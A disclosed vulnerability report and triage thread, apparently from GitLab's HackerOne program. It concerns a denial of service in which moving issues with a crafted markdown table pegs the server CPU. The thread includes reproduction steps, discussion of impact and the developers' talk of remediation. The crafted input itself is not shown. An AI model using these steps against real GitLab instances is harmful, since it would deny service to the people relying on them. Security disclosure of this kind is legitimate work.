When evaluating Availability impact for DoS that requires continuous traffic, use the 1k Reference Architecture. The number of requests must be less than the "test request rate per second" and cause unavailability of 10+ seconds that the user can perceive to assess the impact as A:H . clarifying-notes.
Moving an issue with a specially-crafted description Linear-sized input creates a square-sized table results in high CPU usage for 60 seconds (request timeout).
The table syntax allows columns to be omitted from some of the rows. Rows with too few columns are automatically extended to the correct length. For example, each |a| row in this example gets extended to 5 columns:
Steps to reproduce
Reproduce:
Create a project
Create an issue with the following description. (You can skip this way and use the issues at Gitlab. But this is not recommended, Please use your local installation )
Click Bulk Edit in Issues and check the issue you created.
Click Move Selected
Select the project you want to move to to trigger DoS.
System information System: Debian 12 Current User: git Using RVM: no Ruby Version: 3.1.4p223 Gem Version: 3.5.7 Bundler Version:2.5.8 Rake Version: 13.0.6 Redis Version: 7.0.15 Sidekiq Version:7.1.6 Go Version: unknownGitLab information Version: 16.11.1 Revision: 3ad2f8c9e62 Directory: /opt/gitlab/embedded/service/gitlab-rails DB Adapter: PostgreSQL DB Version: 14.11 URL: https://x HTTP Clone URL: https://x/some-group/some-project.git SSH Clone URL: git@x:some-group/some-project.git Using LDAP: no Using Omniauth: yes Omniauth Providers:GitLab Shell Version: 14.35.0 Repository storages: - default: unix:/var/opt/gitlab/gitaly/gitaly.socket GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shellGitaly - default Address: unix:/var/opt/gitlab/gitaly/gitaly.socket - default Version: 16.11.1 - default Git Version: 2.43.2
S:C Impact caused to systems beyond the exploitable component ( Graphql )
This issue can cause the graphql endpoint to DoS. This results in the cvss score being S:C Because the vulnerable component is GitLab and the affected component is the production server ( Graphql )
{"data":{"issueMove":null},"errors":[{"message":"Timeout on Base.issue","locations":[{"line":3,"column":5}] ,"path":["issueMove","issue"]},{"message":"Timeout on BaseMutation.errors","locations":[{"line":8,"column":5}]," path":["issueMove","errors"]}]}
Thank you for your submission. I hope you are well. Your report is currently being reviewed and the HackerOne triage team will get back to you once there is additional information to share.
Have a great day!
Kind regards,
[@]h1_analyst_indy
Comment originally created at 2024-05-02 09:55:44.172000+00:00
Current PoC shows attacker's request failed, and CPU core may reach 100% temporarily. However, it doesn't show any Available impact to other users on the same instance.
Could you please provide additional PoC to demonstrate that this finding can impact other users? Thanks!
Kind regards,
[@]h1_analyst_indy
Comment originally created at 2024-05-02 10:01:47.123000+00:00
Could you please provide additional PoC to demonstrate that this finding can impact other users? Thanks!
I've attached the latest proof of concept. Other users really can't use the gitlab instance. I think this is a valid vulnerability and the report should be re-opened.
Left screen: Other users (Firefox Browser)
Right screen : Attacker (Chrome)
Current PoC shows attacker's request failed, and CPU core may reach 100% temporarily
Moving 5 issues at once completely burns all the CPU cores, and doing it repeatedly causes the instances to be deleted.
moveissue.mp4
This bug can be exploited at gitlab.com
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
First of all, as I mentioned several times in your other reports, please do not attempt to test potential DoS related issue on gitlab.com. It is prohibited. Please only perform such test on your own GitLab instance.
I will continue to validate this report and update you the program.
Kind regards,
[@]h1_analyst_indy
Comment originally created at 2024-05-03 09:59:47.567000+00:00
I created 6 Issues using [DoS_Move_Issues.txt](https://h1.sec.gitlab.net/a/b0c5cf41-ddc9-4ef0-9cd9-153fbc7146b4/DoS_Move_Issues.txt): DoS_Move_Issues.txt as issue description. When I moved all selected issues, I'm able to see several CPU cores reached 100%:
However, I can still load any project on my test instance using victim's account. Your PoC video doesn't show the impact to victim either. Therefore, current PoC doesn't appear to be causing any considerable Availability to other user.
If you are able to crash server or deny victim access to self-hosted GitLab instance, please provide an additional PoC. Thanks!
Kind regards,
[@]h1_analyst_indy
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
I created 6 Issues using DoS_Move_Issues.txt: DoS_Move_Issues.txt as issue description. When I moved all selected issues, I'm able to see several CPU cores reached 100%:
Yes, Thank you for trying to reproduce and confirm that the core CPU reaches 100%.
However, I can still load any project on my test instance using victim's account. Your PoC video doesn't show the impact to the victim either. Therefore, current PoC doesn't appear to be causing any considerable availability to other users.
It's true, moving one problem requires one CPU. Each move will use 100% cpu for 1 minute - the denial of service comes entirely from the amount of CPU on your gitlab instance.
I think 20 requests to move all selected issues could lead to a complete denial of service.
This issue is a bypass report from https://hackerone.com/reports/1543584. You can see gitlab's internal team working on this issue. So immediately discuss it with the internal Gitlab team to validate this report.
Comment originally created at 2024-05-03 11:20:56.534000+00:00
If you are able to crash the server or deny victim access to self-hosted GitLab instance, please provide an additional PoC. Thanks!
Remembering I was using AWS ec2 with Billing and Cost Management consumption to do DoS testing wiped out my entire local instance. Can you try to reproduce it in parallel moving more than 6 problems?
Comment originally created at 2024-05-03 11:52:37.021000+00:00
The report I sent is a bypass of the report sent by the previous researcher #1543584. I looked deep into the report here #362379 (comment 946300622) . Open the researcher's POC file recording-1652343565697.webm .
I looked at the top command and it focused on memory , you can see the researchers used a machine with 8 GB of memory . This means that researchers did not follow the dos testing recommendations https://docs.gitlab.com/ee/administration/reference_architectures/1k_users.html 8vCPU and 16 GB memory. and this is still considered a valid report by gitlab internals, even getting a cvss score of Availability:High.
So at this stage it can be said that my report is valid, because all the reports I sent for DoS testing used 8vCPU and 16GB Memory. ready to be forwarded to the internal Gitlab team so that the status changes to triage. So I hope that when you read my comment you can immediately forward this report to Gitlab internally.
Kind regards,
Sigit S.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
Left Side (Attacker) Google Chrome.
Right Side (Sacrifice) Mozilla Firefox.
Attacker's POV: When moving an issue repeatedly the CPU core will experience a 100% CPU spike. When the attacker processes the issue move the victim gets http 502 because the CPU is too full and waiting to boot.
Move_Issues.mp4
Victim's POV: The victim gets http 502 and cannot access anything in the instance.
Kind regards,
Sigit S.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
Thank you for your reply! I'm able to reproduce the issue in your report and have submitted it to the appropriate remediation team for review. They will let us know the final ruling on this report, and when/if a fix will be implemented. Please note that the status and severity are subject to change. Thanks!
Kind regards,
[@]h1_analyst_indy
Comment originally created at 2024-05-06 11:13:07.944000+00:00
@digitalmoksha this report looks to be a bypass of #362379 (closed) which was a ReDOS vulnerability and was patched in 15.4.1
If this is also due to ReDOS, it is out of scope (for now) for our HackerOne program and we can close this, but I wanted to get another set of eyes on it before I close it. Please advise.
This hits many filters. Some might be the regex patterns in those filters, others is a more general problem I've started seeing when we have massive amounts of html to update. For example https://gitlab.com/gitlab-org/security/gitlab/-/merge_requests/3924 where there are a gazillion emojis for us to put our special html tags on. Or #429596 (closed) which I noticed. When we have to decorate lots of HTML with our own attributes, it can really take time to complete that.
This class of problem is not as easy to fix. Some can have imposed limits. But obviously we can't limit sanitization. We might get some relief from using the latest version of html-pipeline, which replaces the use of nokogiri with a more high performance Rust version called Selma.
Selma's strength (aside from being backed by Rust) is that HTML content is parsed once and can be manipulated multiple times.
So there are things are can try. However one of the difficulties of say using the new version of html-pipeline is that it's a bit of an upgrade. And not something I'm crazy about doing in a security patch with 3 back ports.
So I don't know how you guys want to handle these...
How much effort do you think it will take to fix it "the right way"?
I notice that we have quite a lot of issues related to markdown that can cause some sort of vulnerability. Is there anything we can do to limit the impact of those DoS attacks? E.g. set a fixed time limit for every filter or limit for the whole pipeline? Ideally, something that would allow us to reduce all those issues to severity4
Do you think groupknowledge should own all the security issues related to markdown? Is there a way to split the responsibility with some other teams?
If following the security process is too costly, can we somehow fix it via normal development process without directly exposing the vulnerability?
@digitalmoksha thanks for that analysis. So this is generally just about performance limitations in certain situations.
@cmaxim as SC for groupproject management what are your thoughts? If this was ReDOS it would be out of scope for H1, but as it is we will be subject to SLAs to remediate this.
How much effort do you think it will take to fix it "the right way"?
I really don't know yet, it needs more investigation. Though I would prefer a 90 day SLA versus a 60 day one.
I notice that we have quite a lot of issues related to markdown that can cause some sort of vulnerability. Is there anything we can do to limit the impact of those DoS attacks? E.g. set a fixed time limit for every filter or limit for the whole pipeline? Ideally, something that would allow us to reduce all those issues to severity4
We do use it for say the SyntaxHighlighterFilter, and we can judiciously add it other filters. But adding it to everything also just hides problems that really should be fixed.
And it can't be used for the SanitizationFilter - if we can't sanitize completely, then we can't show anything. If I can't fix the filter, then as a last resort we might have to timeout the filter and abort the entire pipeline.
Do you think groupknowledge should own all the security issues related to markdown? Is there a way to split the responsibility with some other teams?
In general, yes. Most of the ones we're seeing are core pipeline/filter problems, and I do think we own those. There are exceptions, for example the gollum regex issue, I would look to whoever owns the wiki code fix that one .
If following the security process is too costly, can we somehow fix it via normal development process without directly exposing the vulnerability?
This I would like to do. For example, upgrading html-pipeline (once I verify that it will help) I would like to be able to do in canonical, and not backport it. Backporting would be a huge amount of work. And we already have an issue tracking it: Upgrade html-pipeline to V3 (#412562)
If this vulnerability is for a featureflagdisabled issue, regular SLOs don't apply and it simply should be scheduled to be fixed before the feature is made generally available. If you need an exception to the SLA, follow the SLA exception procedures.
This vulnerability was rated severity3 on 2024-05-06,
and must be fixed within 90 days.
To meet the remediation SLA, the change must make it into the security release
before 2024-07-18 (the monthly release date before the remediation SLA).
@kmorrison1 I don't intend to ever turn off the confidentiality on that epic - it's there to manage different security issues over time. So we shouldn't need to tie the confidentiality of this issue with it's epic.
@digitalmoksha Thanks, that's fine. I'd have to unlink this issue from the epic for the system to allow me to set it to public. I'm not sure if it's better to leave it linked, or to unlink it. I don't want to lose future context, but maybe it doesn't matter too much.
@kmorrison1 oh, interesting. Yeah I don't want to lose context either. But of course these need to be made public.
I tried adding the issue to related items, but you can't do that it the epic is a parent. So we can remove the epic as the parent, and then add the issue to the related links. That should give us enough context.